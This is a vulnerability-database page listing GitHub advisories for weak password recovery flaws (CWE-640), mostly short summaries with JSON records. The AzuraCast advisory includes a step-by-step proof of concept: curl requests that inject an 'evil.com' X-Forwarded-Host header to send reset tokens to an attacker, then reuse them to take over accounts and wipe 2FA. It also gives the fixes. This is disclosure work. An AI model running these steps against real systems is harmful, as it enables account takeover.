Common Weakness Enumeration

CWE-640

Allowed-with-Review

Weak Password Recovery Mechanism for Forgotten Password

Abstraction: Base · Status: Incomplete

The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.

393 vulnerabilities reference this CWE, most recent first.

GHSA-GMX4-3375-7G3W

Vulnerability from github – Published: 2022-05-17 02:25 – Updated: 2022-05-17 02:25
VLAI
Details

Remedy AR System Server in BMC Remedy 8.1 SP 2, 9.0, 9.0 SP 1, and 9.1 allows attackers to reset arbitrary passwords via a blank previous password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-2349"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-12-21T22:59:00Z",
    "severity": "HIGH"
  },
  "details": "Remedy AR System Server in BMC Remedy 8.1 SP 2, 9.0, 9.0 SP 1, and 9.1 allows attackers to reset arbitrary passwords via a blank previous password.",
  "id": "GHSA-gmx4-3375-7g3w",
  "modified": "2022-05-17T02:25:41Z",
  "published": "2022-05-17T02:25:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2349"
    },
    {
      "type": "WEB",
      "url": "https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA214000000l6kbCAA\u0026type=Solution"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/95075"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1037529"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GP7M-HV9G-C42R

Vulnerability from github – Published: 2022-05-24 16:55 – Updated: 2024-04-04 01:54
VLAI
Details

TTLock devices do not properly restrict password-reset attempts, leading to incorrect access control and disclosure of sensitive information about valid account names.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-12943"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-09-10T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "TTLock devices do not properly restrict password-reset attempts, leading to incorrect access control and disclosure of sensitive information about valid account names.",
  "id": "GHSA-gp7m-hv9g-c42r",
  "modified": "2024-04-04T01:54:57Z",
  "published": "2022-05-24T16:55:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12943"
    },
    {
      "type": "WEB",
      "url": "https://www.kth.se/polopoly_fs/1.923564.1568098316!/Vulnerability_Report_TTLock_Password_Reset.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.kth.se/polopoly_fs/1.923564.1568098316%21/Vulnerability_Report_TTLock_Password_Reset.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GV7R-3MR9-H5X8

Vulnerability from github – Published: 2026-05-04 21:17 – Updated: 2026-05-13 13:42
VLAI
Summary
AzuraCast has Password Reset Poisoning via Untrusted X-Forwarded-Host Header that Leads to Account Takeover and 2FA Bypass
Details

Summary

The ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover.

Details

Root Cause 1: Unconditional X-Forwarded-Host Trust

backend/src/Middleware/ApplyXForwarded.php:35-40:

if ($request->hasHeader('X-Forwarded-Host')) {
    $hasXForwardedHeader = true;
    $xfHost = Types::stringOrNull($request->getHeaderLine('X-Forwarded-Host'), true);
    if (null !== $xfHost) {
        $uri = $uri->withHost($xfHost);
    }
}

There is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.

In the default Docker deployment, nginx's PHP location block (util/docker/web/nginx/azuracast.conf.tmpl:150-171) uses fastcgi_pass with include fastcgi_params. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as HTTP_* parameters. The proxy_params.conf file — which explicitly sets X-Forwarded-For, X-Forwarded-Proto, and X-Forwarded-Port — only applies to proxy_pass directives (websocket and vite dev server), NOT to the fastcgi_pass PHP handler. Therefore, client-supplied X-Forwarded-Host reaches PHP unmodified.

Root Cause 2: Request Host Used for Security-Critical URLs

backend/src/Http/Router.php:53-77 in buildBaseUrl():

$useRequest ??= $settings->prefer_browser_url; // default: true

// ...
if ($useRequest || $baseUrl->getHost() === '') {
    $ignoredHosts = ['web', 'nginx', 'localhost'];
    if (!in_array($currentUri->getHost(), $ignoredHosts, true)) {
        $baseUrl = (new Uri())
            ->withScheme($currentUri->getScheme())
            ->withHost($currentUri->getHost())
            ->withPort($currentUri->getPort());
    }
}

With prefer_browser_url = true (the default at backend/src/Entity/Settings.php:109), the request URI host — already poisoned by ApplyXForwarded — is used as the base URL for generating absolute URLs. Even if a base_url is configured in settings, it is overridden by the poisoned request host.

Root Cause 3: Password Reset Generates Absolute URL

backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77:

$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true
);

This URL is embedded in the password reset email sent to the victim.

Root Cause 4: Reset Token Wipes 2FA

backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75:

$user->setNewPassword($data['password']);
$user->two_factor_secret = null;

When a ResetPassword token is consumed, the user's 2FA secret is unconditionally destroyed.

PoC

Prerequisites: An AzuraCast instance with a user account (e.g., admin@target.com) that has 2FA enabled. Attacker controls evil.com with a web server that logs incoming requests.

Step 1: Trigger poisoned password reset

curl -X POST https://target.azuracast.example/forgot \
  -H "X-Forwarded-Host: evil.com" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "email=admin@target.com"

Expected result: The password reset email sent to admin@target.com contains a URL like:

https://evil.com/login-token/abc123def456...

Step 2: Capture the token

When the victim clicks the link in their email, their browser navigates to https://evil.com/login-token/abc123def456.... The attacker's web server at evil.com captures the full URL path, extracting the token abc123def456....

Step 3: Use token on real instance

# First, GET the reset page to obtain CSRF token
curl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...

# Extract CSRF token from response, then POST new password
curl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "csrf=<extracted_csrf_token>&password=AttackerPassword123"

Result: The victim's password is changed to AttackerPassword123 and their 2FA is destroyed (two_factor_secret = null). The attacker is logged in with full access.

Impact

  • Full account takeover of any user account, including administrators, without any prior authentication
  • 2FA bypass — the password reset flow unconditionally destroys 2FA configuration, negating its security benefit
  • Administrative compromise — if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings
  • The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success

Recommended Fix

Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist

In backend/src/Middleware/ApplyXForwarded.php, only apply X-Forwarded-* headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):

// Add trusted proxy check
$trustedProxies = ['127.0.0.1', '::1', 'nginx', 'web'];
$remoteAddr = $request->getServerParams()['REMOTE_ADDR'] ?? '';

if (!in_array($remoteAddr, $trustedProxies, true)) {
    return $handler->handle($request);
}

// ... existing X-Forwarded-* processing

Fix 2 (Defense in depth): Use configured base URL for security-critical emails

In ForgotPasswordAction.php, generate the reset URL using the configured base_url setting rather than the request-derived URL:

$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true,
    // Force use of configured base URL, not request host
);

Or modify Router::buildBaseUrl() to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.

Fix 3 (Defense in depth): Don't wipe 2FA on password reset

In LoginTokenAction.php:75, remove the line $user->two_factor_secret = null;. If 2FA recovery is needed, it should be a separate, explicit flow — not a side effect of password reset.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.23.5"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "azuracast/azuracast"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.23.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42606"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T21:17:45Z",
    "nvd_published_at": "2026-05-09T20:16:30Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `ApplyXForwarded` middleware unconditionally trusts the client-supplied `X-Forwarded-Host` HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker\u0027s server. The attacker then uses the token on the real instance to reset the victim\u0027s password and destroy their 2FA configuration, achieving full account takeover.\n\n## Details\n\n### Root Cause 1: Unconditional X-Forwarded-Host Trust\n\n`backend/src/Middleware/ApplyXForwarded.php:35-40`:\n```php\nif ($request-\u003ehasHeader(\u0027X-Forwarded-Host\u0027)) {\n    $hasXForwardedHeader = true;\n    $xfHost = Types::stringOrNull($request-\u003egetHeaderLine(\u0027X-Forwarded-Host\u0027), true);\n    if (null !== $xfHost) {\n        $uri = $uri-\u003ewithHost($xfHost);\n    }\n}\n```\n\nThere is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.\n\nIn the default Docker deployment, nginx\u0027s PHP location block (`util/docker/web/nginx/azuracast.conf.tmpl:150-171`) uses `fastcgi_pass` with `include fastcgi_params`. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as `HTTP_*` parameters. The `proxy_params.conf` file \u2014 which explicitly sets `X-Forwarded-For`, `X-Forwarded-Proto`, and `X-Forwarded-Port` \u2014 only applies to `proxy_pass` directives (websocket and vite dev server), NOT to the `fastcgi_pass` PHP handler. Therefore, client-supplied `X-Forwarded-Host` reaches PHP unmodified.\n\n### Root Cause 2: Request Host Used for Security-Critical URLs\n\n`backend/src/Http/Router.php:53-77` in `buildBaseUrl()`:\n```php\n$useRequest ??= $settings-\u003eprefer_browser_url; // default: true\n\n// ...\nif ($useRequest || $baseUrl-\u003egetHost() === \u0027\u0027) {\n    $ignoredHosts = [\u0027web\u0027, \u0027nginx\u0027, \u0027localhost\u0027];\n    if (!in_array($currentUri-\u003egetHost(), $ignoredHosts, true)) {\n        $baseUrl = (new Uri())\n            -\u003ewithScheme($currentUri-\u003egetScheme())\n            -\u003ewithHost($currentUri-\u003egetHost())\n            -\u003ewithPort($currentUri-\u003egetPort());\n    }\n}\n```\n\nWith `prefer_browser_url = true` (the default at `backend/src/Entity/Settings.php:109`), the request URI host \u2014 already poisoned by `ApplyXForwarded` \u2014 is used as the base URL for generating absolute URLs. Even if a `base_url` is configured in settings, it is overridden by the poisoned request host.\n\n### Root Cause 3: Password Reset Generates Absolute URL\n\n`backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77`:\n```php\n$router = $request-\u003egetRouter();\n$url = $router-\u003enamed(\n    routeName: \u0027account:login-token\u0027,\n    routeParams: [\u0027token\u0027 =\u003e $token],\n    absolute: true\n);\n```\n\nThis URL is embedded in the password reset email sent to the victim.\n\n### Root Cause 4: Reset Token Wipes 2FA\n\n`backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75`:\n```php\n$user-\u003esetNewPassword($data[\u0027password\u0027]);\n$user-\u003etwo_factor_secret = null;\n```\n\nWhen a `ResetPassword` token is consumed, the user\u0027s 2FA secret is unconditionally destroyed.\n\n## PoC\n\n**Prerequisites:** An AzuraCast instance with a user account (e.g., `admin@target.com`) that has 2FA enabled. Attacker controls `evil.com` with a web server that logs incoming requests.\n\n### Step 1: Trigger poisoned password reset\n\n```bash\ncurl -X POST https://target.azuracast.example/forgot \\\n  -H \"X-Forwarded-Host: evil.com\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  -d \"email=admin@target.com\"\n```\n\n**Expected result:** The password reset email sent to `admin@target.com` contains a URL like:\n```\nhttps://evil.com/login-token/abc123def456...\n```\n\n### Step 2: Capture the token\n\nWhen the victim clicks the link in their email, their browser navigates to `https://evil.com/login-token/abc123def456...`. The attacker\u0027s web server at `evil.com` captures the full URL path, extracting the token `abc123def456...`.\n\n### Step 3: Use token on real instance\n\n```bash\n# First, GET the reset page to obtain CSRF token\ncurl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...\n\n# Extract CSRF token from response, then POST new password\ncurl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  -d \"csrf=\u003cextracted_csrf_token\u003e\u0026password=AttackerPassword123\"\n```\n\n**Result:** The victim\u0027s password is changed to `AttackerPassword123` and their 2FA is destroyed (`two_factor_secret = null`). The attacker is logged in with full access.\n\n## Impact\n\n- **Full account takeover** of any user account, including administrators, without any prior authentication\n- **2FA bypass** \u2014 the password reset flow unconditionally destroys 2FA configuration, negating its security benefit\n- **Administrative compromise** \u2014 if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings\n- The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success\n\n## Recommended Fix\n\n**Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist**\n\nIn `backend/src/Middleware/ApplyXForwarded.php`, only apply `X-Forwarded-*` headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):\n\n```php\n// Add trusted proxy check\n$trustedProxies = [\u0027127.0.0.1\u0027, \u0027::1\u0027, \u0027nginx\u0027, \u0027web\u0027];\n$remoteAddr = $request-\u003egetServerParams()[\u0027REMOTE_ADDR\u0027] ?? \u0027\u0027;\n\nif (!in_array($remoteAddr, $trustedProxies, true)) {\n    return $handler-\u003ehandle($request);\n}\n\n// ... existing X-Forwarded-* processing\n```\n\n**Fix 2 (Defense in depth): Use configured base URL for security-critical emails**\n\nIn `ForgotPasswordAction.php`, generate the reset URL using the configured `base_url` setting rather than the request-derived URL:\n\n```php\n$router = $request-\u003egetRouter();\n$url = $router-\u003enamed(\n    routeName: \u0027account:login-token\u0027,\n    routeParams: [\u0027token\u0027 =\u003e $token],\n    absolute: true,\n    // Force use of configured base URL, not request host\n);\n```\n\nOr modify `Router::buildBaseUrl()` to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.\n\n**Fix 3 (Defense in depth): Don\u0027t wipe 2FA on password reset**\n\nIn `LoginTokenAction.php:75`, remove the line `$user-\u003etwo_factor_secret = null;`. If 2FA recovery is needed, it should be a separate, explicit flow \u2014 not a side effect of password reset.",
  "id": "GHSA-gv7r-3mr9-h5x8",
  "modified": "2026-05-13T13:42:21Z",
  "published": "2026-05-04T21:17:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42606"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AzuraCast/AzuraCast"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AzuraCast has Password Reset Poisoning via Untrusted X-Forwarded-Host Header that Leads to Account Takeover and 2FA Bypass"
}

GHSA-GXF7-Q22C-VMRJ

Vulnerability from github – Published: 2026-07-12 12:31 – Updated: 2026-07-12 12:31
VLAI
Details

Capgo before 12.128.2 allows email address changes without requiring current password re-authentication or verification of the existing email address. An attacker with access to a valid session cookie or authenticated browser can change the account email to gain control of account recovery and bypass multi-factor authentication protections.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-56308"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-12T12:16:45Z",
    "severity": "HIGH"
  },
  "details": "Capgo before 12.128.2 allows email address changes without requiring current password re-authentication or verification of the existing email address. An attacker with access to a valid session cookie or authenticated browser can change the account email to gain control of account recovery and bypass multi-factor authentication protections.",
  "id": "GHSA-gxf7-q22c-vmrj",
  "modified": "2026-07-12T12:31:48Z",
  "published": "2026-07-12T12:31:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Cap-go/capgo/security/advisories/GHSA-9px4-w25f-mvm4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56308"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/capgo-insufficient-authentication-in-email-change-endpoint"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-H363-2PF8-49MQ

Vulnerability from github – Published: 2025-01-09 06:30 – Updated: 2025-01-09 06:30
VLAI
Details

A vulnerability, which was classified as critical, has been found in YunzMall up to 2.4.2. This issue affects the function changePwd of the file /app/platform/controllers/ResetpwdController.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-0331"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-09T05:15:08Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability, which was classified as critical, has been found in YunzMall up to 2.4.2. This issue affects the function changePwd of the file /app/platform/controllers/ResetpwdController.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-h363-2pf8-49mq",
  "modified": "2025-01-09T06:30:23Z",
  "published": "2025-01-09T06:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0331"
    },
    {
      "type": "WEB",
      "url": "https://note.zhaoj.in/share/DsijzdQDJSAp"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.290819"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.290819"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.471663"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-HGCM-PH3V-MP4J

Vulnerability from github – Published: 2025-08-20 15:31 – Updated: 2025-08-20 15:31
VLAI
Details

A vulnerability in the password reset workflow of the Touch Lebanon Mobile App 2.20.2 allows an attacker to bypass the OTP reset password mechanism. By manipulating the reset process, an unauthorized user may be able to reset the password and gain access to the account without needing to provide a legitimate authentication factor, such as an OTP. This compromises account security and allows for potential unauthorized access to user data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-50503"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-20T14:15:45Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the password reset workflow of the Touch Lebanon Mobile App 2.20.2 allows an attacker to bypass the OTP reset password mechanism. By manipulating the reset process, an unauthorized user may be able to reset the password and gain access to the account without needing to provide a legitimate authentication factor, such as an OTP. This compromises account security and allows for potential unauthorized access to user data.",
  "id": "GHSA-hgcm-ph3v-mp4j",
  "modified": "2025-08-20T15:31:41Z",
  "published": "2025-08-20T15:31:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50503"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ksarieddine/disclosures/blob/main/Touch%20Mobile%20Application/2FA%20Bypass%20-%20Touch%20Lebanon.md"
    },
    {
      "type": "WEB",
      "url": "https://www.touch.com.lb/autoforms/portal/touch/personal/contentandapps/mobileapp"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HHQ2-W5V4-QXJ2

Vulnerability from github – Published: 2026-01-22 15:31 – Updated: 2026-01-22 15:31
VLAI
Details

A security flaw has been discovered in Sangfor Operation and Maintenance Security Management System up to 3.0.12. This affects the function edit_pwd_mall of the file /fort/login/edit_pwd_mall. The manipulation of the argument flag results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1325"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-22T15:16:50Z",
    "severity": "MODERATE"
  },
  "details": "A security flaw has been discovered in Sangfor Operation and Maintenance Security Management System up to 3.0.12. This affects the function edit_pwd_mall of the file /fort/login/edit_pwd_mall. The manipulation of the argument flag results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-hhq2-w5v4-qxj2",
  "modified": "2026-01-22T15:31:32Z",
  "published": "2026-01-22T15:31:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1325"
    },
    {
      "type": "WEB",
      "url": "https://github.com/LX-LX88/cve/issues/21"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.342301"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.342301"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.736208"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-HM5M-9PHW-V9HQ

Vulnerability from github – Published: 2025-11-10 03:30 – Updated: 2025-11-12 18:31
VLAI
Details

EIP Plus developed by Hundred Plus has a Weak Password Recovery Mechanism vulnerability, allowing unauthenticated remote attacker to predict or brute-force the 'forgot password' link, thereby successfully resetting any user's password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12866"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-10T03:15:42Z",
    "severity": "CRITICAL"
  },
  "details": "EIP Plus developed by Hundred Plus has a Weak Password Recovery Mechanism vulnerability, allowing unauthenticated remote attacker to predict or brute-force the \u0027forgot password\u0027 link, thereby successfully resetting any user\u0027s password.",
  "id": "GHSA-hm5m-9phw-v9hq",
  "modified": "2025-11-12T18:31:10Z",
  "published": "2025-11-10T03:30:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12866"
    },
    {
      "type": "WEB",
      "url": "https://www.chtsecurity.com/news/20848f61-9db5-44fd-8574-c9d6a54e4010"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/en/cp-139-10491-004b0-2.html"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-10490-2534b-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-HP5W-3HXX-VMWF

Vulnerability from github – Published: 2026-04-01 16:08 – Updated: 2026-04-08 18:19
VLAI
Summary
Payload: Pre-Authentication Account Takeover via Parameter Injection in Password Recovery
Details

Impact

A vulnerability in the password recovery flow could allow an unauthenticated attacker to perform actions on behalf of a user who initiates a password reset.

Users are affected if:

  • They are using Payload version < v3.79.1 with any auth-enabled collection using the built-in forgot-password functionality.

Patches

Input validation and URL construction in the password recovery flow have been hardened.

Users should upgrade to v3.79.1 or later.

Workarounds

There are no complete workarounds. Upgrading to v3.79.1 is recommended.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "payload"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.79.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@payloadcms/graphql"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.79.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34751"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-472",
      "CWE-640"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T16:08:02Z",
    "nvd_published_at": "2026-04-01T18:16:31Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nA vulnerability in the password recovery flow could allow an unauthenticated attacker to perform actions on behalf of a user who initiates a password reset.\n\nUsers are affected if:\n\n- They are using Payload version **\u003c v3.79.1** with any auth-enabled collection using the built-in `forgot-password` functionality.\n\n### Patches\n\nInput validation and URL construction in the password recovery flow have been hardened.\n\nUsers should upgrade to **v3.79.1** or later.\n\n### Workarounds\n\nThere are no complete workarounds. Upgrading to **v3.79.1** is recommended.",
  "id": "GHSA-hp5w-3hxx-vmwf",
  "modified": "2026-04-08T18:19:10Z",
  "published": "2026-04-01T16:08:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/payloadcms/payload/security/advisories/GHSA-hp5w-3hxx-vmwf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34751"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/payloadcms/payload"
    },
    {
      "type": "WEB",
      "url": "https://github.com/payloadcms/payload/releases/tag/v3.79.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Payload: Pre-Authentication Account Takeover via Parameter Injection in Password Recovery"
}

GHSA-HPPR-5P45-XR8C

Vulnerability from github – Published: 2023-01-31 18:30 – Updated: 2023-02-08 03:30
VLAI
Details

COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Account takeover. Anyone can reset the password of the admin accounts.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-47697"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-522",
      "CWE-640"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-31T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 and before is vulnerable to Account takeover. Anyone can reset the password of the admin accounts.",
